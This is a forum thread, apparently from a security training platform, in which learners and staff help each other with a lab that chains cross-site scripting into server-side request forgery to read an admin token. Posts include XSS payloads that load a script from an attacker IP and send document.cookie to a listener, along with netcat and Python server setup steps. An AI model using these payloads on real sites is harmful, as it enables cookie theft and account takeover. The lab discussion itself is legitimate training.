shubham
Bronze I
Bronze ICross-Site Scripting: Ep.6 β Further Exploitation
I was stuck in one question looking for HINT.
Extend the XSS vulnerability to view the contents of the /admin/token page with SSRF.
Forum Discussion
- ChrisKershaw
Community Support
Hey shubham
Thank you for posting, and welcome to the Human Connection! I'm Chris, I work in the Customer Support Team, and I'll be happy to help you with your attempt π.
I'll be happy to share a hint to help you with your lab attempt:
In the Ask a Question page, add the following to the Message field: <script src="http://$KALI_IP/script.js" ></script>
Will you see if this helps you with your attempt? - KieranRowley
Community Manager
Hi shubham welcome to The Human Connection!
Please can you provide some detail of the steps you have already taken so that your fellow community members are able to assist you?
shubhamThanks for welcome.
So I tire using netcat with the payload in message to make a reverse connection
Payload:<img src=xss onload="this.src='http://10.102.181.168:5556/admin/token?'+document.cookie;this.removeAttribute('onerror');"/>
- KieranRowley
Hi shubham did the information above help?
If so, please don't forget to mark it as a Solution β
Marking a reply as a solution helps other community members to find answers to questions that they may also have. It also confirms to your fellow community members that their reply was helpful! You can accept more than one reply as a solution.
me5382I am also having problems on this lesson. So far I haven't been able to get the site to execute any new code
I tried running the hint from below as well as the following:
<script src="http://0.0.0.0:8080/script.js"></script>
My console just converts it to a string and does not actually call into the <script>. (notice how the question field is a string).
I am sure I must be misunderstanding something, any help would be appreciated.- KieranRowley
- natelott
Having the same issues. Script is running, but /admin/token immediately redirects back to /dashboard. Executed JS code in console and it returns html from /dashboard.
Created script.js on VM. Running netcat instance on port 8080 to handle HTTP request. I can see the request occur in terminal. Token not returned.
Command being used in message field: <script src="http://0.0.0.0:8080/script.js"></script>
- NyePrior
Immerser
- natelott
NyePriorThanks for the reply. I also tried this method. I used ip address from ifconfig, local host (127.0.0.1), and 0.0.0.0 got the same result. If that were the case, how am I able to open the js file in the browser using http://0.0.0.0:8080/script.js url? The JS is executing when I expose the vulnerability and I can see the request happen in netcat... Therefore I feel confident that the issue is inside the js file or with the /admin/token itself. I have tried the python method and the netcat method. The /admin/token endpoint gets me a 302 permanent redirect. As a python full stack developer w/ a good understanding of accessing local host as a local web server... I think I'm missing something else or not understanding the flow completely.
- natelott
They key is knowing that you have to use python to host the remote .js file in parallel with netcat to listen for the response of the XSS malicious scripts. Additionally, there are two steps to expose the data. One exposes the username and token cookie (question 1&2) in the query parameters. The other displays the token in the html body. The example code snippets work with VERY minor modifications. One thing I did based on feedback from a peer, was to wrap Netcat in a look to keep it active in terminal for subsequent requests.
- CyberSharpe
Bronze III
Agreed.
Run XSS exploit ensure your script allows this to loop with NC listening. Name and cookie given instantly. Then i hosted the payload using http.server and conducted SSRF this time using a different port number and NC. This dropped the full body then a cyber chef URLDecode the answer is available.
The actual script doesnβt need much work.
johndoe321I have done the following so far:
- Identify the wildcard cycles employee user ID & token
- Host the http server using the python module (port 8080)
- Create a script.js file w/ the code provided in the Briefing section w/ the XMLHttpRequest object's open method's url parameter set to /admin/token instead of /users/data (tried setting this many different things including http://{ip of employee machine}/admin/token, /{employee id}/{token} -
- All the while having the nc -vnlp 5555 looping in an infinite while loop
On the terminal monitoring the http server activity, I see a GET /script.js every ~60s or so, and each time that happens, the nc listening on 5555 shows the same keepalive traffic w/ the same user ID & token information, but not the contents of the actual /admin/token page...
I have a feeling I am missing something in item 3 listed above - something not right w/ how i have the script.js payload set up...
Been stuck on this for way longer than I care to, any guidance would be greatly appreciated.
- CyberSharpe
johndoe321I changed the script to a different port to the one being bombarded and did another NC listener on that different port. Roled right in.
- johndoe321
Wow that did it instantly, thank you CyberSharpe!! Guess 5555 is already in-use/bound to the first exploit...
- TillyCorless
Hey johndoe321 I'm pleased that CyberSharpe was able to help you here! If you found their reply useful, please don't forget to mark it as a Solution β
Marking a reply as a solution helps other community members to find answers to questions that they may also have. It also confirms to your fellow community members that their reply was helpful! You can accept more than one reply as a solution.
- These replies have been moved.
